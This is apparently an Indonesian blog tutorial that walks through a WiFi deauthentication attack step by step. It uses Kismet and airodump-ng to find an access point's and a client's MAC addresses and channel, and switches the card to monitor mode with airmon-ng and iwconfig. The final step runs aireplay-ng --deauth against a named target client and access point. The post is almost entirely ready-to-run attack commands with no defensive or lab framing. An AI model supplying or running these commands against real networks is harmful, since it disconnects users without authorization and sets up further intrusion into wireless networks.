1. Jalankan Live CD LinuxBackTrack 2.
2. Jalankan Kismet untuk mengetahui MAC-Address AP dan MAC-Address Client serta channel dari AP. Lalu catat semua infrmasi yang didapat.
3. Tutup Kismet, lalu buka console, ketikkan:
#airmon-ng stop ath0 -> untuk mematikan driver ath0
#airmon-ng stop ath1 -> untuk mematikan driver ath1
#airmon-ng start wifi0 -> menghidupkan/mengaktifkan driver
4. Jalankan scanning wireless menggunakan Airodump :
#airodump-ng ath0
5. Berikutnya buka konsole satu lag(dgn Airodump masih aktif jalan) lakukan setting ath0 untuk melakukan serangan (De Authentication) pada komputer client (target). Ketikkan:
#ifconfig ath0 up -> untuk mengaktifkan ath0
#iwconfig ath0 mode monitor channel 11 -> menentukan agar ath0 dalam mode monitor, sedangkan angka 11 merupakan channel yang dipakai oleh AP (didapatkan dari hasil scanning Kismet).
6. Langkah terakhir, kita lakukan serangan, ketikkan:
#aireplay-ng --deauth 20 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0
Keterangan:
Aireplay-ng -> program yang digunakan untuk melakukan de authentication
--deauth -> option untuk serangan de authentication
20 -> jumlah sending packet
00:0E:2E:C1:1E:83 -> MAC-Address komputer target
-a -> option untuk Access Point
00:0E:2E:C2:2C:0E -> MAC-Address Access Point
ath0 -> interface yang digunakan untuk menyerang
Tidak ada komentar:
Posting Komentar